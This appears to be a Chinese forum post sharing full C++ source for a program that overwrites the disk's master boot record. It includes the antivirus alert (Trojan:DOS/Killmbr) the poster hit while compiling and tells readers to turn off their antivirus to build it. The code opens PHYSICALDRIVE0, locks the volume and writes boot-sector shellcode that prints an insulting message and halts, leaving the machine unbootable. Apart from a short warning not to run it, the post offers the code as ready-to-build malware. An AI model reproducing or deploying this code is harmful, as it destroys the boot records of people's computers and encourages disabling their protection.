我在編譯的時候,殺毒軟件提示病毒并將其攔截,所以會導致編譯不成功。
1>D:\c++工程\windows\windows\MBR病毒.cpp : fatal error C1083: 無法打開編譯器中間文件:“C:\Users\lenovo\AppData\Local\Temp\_CL_953b34fein”: Permission denied
1>
1>生成失敗。
殺毒軟件提示:
檢測到項目:Trojan:DOS/Killmbr?? 警報級別:嚴重
類別: 特洛伊木馬
描述: 這個程序很危險,它執行來自攻擊者的命令。
建議的操作: 立即刪除這個軟件。
Security Essentials 檢測到可能會侵害您的隱私或損壞計算機的程序。您仍然可以訪問這些程序所使用的文件而不刪除這些程序(不推薦)。若要訪問這些文件,請選擇“允許”操作,并單擊“應用操作”。如果此選項不可用,請以管理員身份登錄或請求安全管理員提供幫助。
項目:
file:C:\Users\lenovo\AppData\Local\Temp\_CL_953b34fein
如果需要生成,需先關閉殺毒軟件。
警告:生成的可執行文件請勿運行,否則由此帶來的后果自負
代碼如下:
程序代碼:
#include <windows.h>
#include <winioctl.h>
unsigned char scode[] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
int WINAPI WinMain(
? HINSTANCE hInstance,? // handle to current instance
? HINSTANCE hPrevInstance,? // handle to previous instance
? LPSTR lpCmdLine,????? // pointer to command line
int nCmdShow????????? // show state of window
)
{
HANDLE hDevice;
DWORD dwBytesWritten, dwBytesReturned;
BYTE pMBR[512] = {0};
// 重新構造MBR
memcpy(pMBR, scode, sizeof(scode) - 1);
pMBR[510] = 0x55;
pMBR[511] = 0xAA;
hDevice = CreateFile
(
"\\\\.\\PHYSICALDRIVE0",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
return -1;
DeviceIoControl
(
hDevice,
FSCTL_LOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
// 寫入病毒內容
WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
DeviceIoControl
(
hDevice,
FSCTL_UNLOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
CloseHandle(hDevice);
return 0;
}
楊航收集技術資料,分享給大家
周報)
)
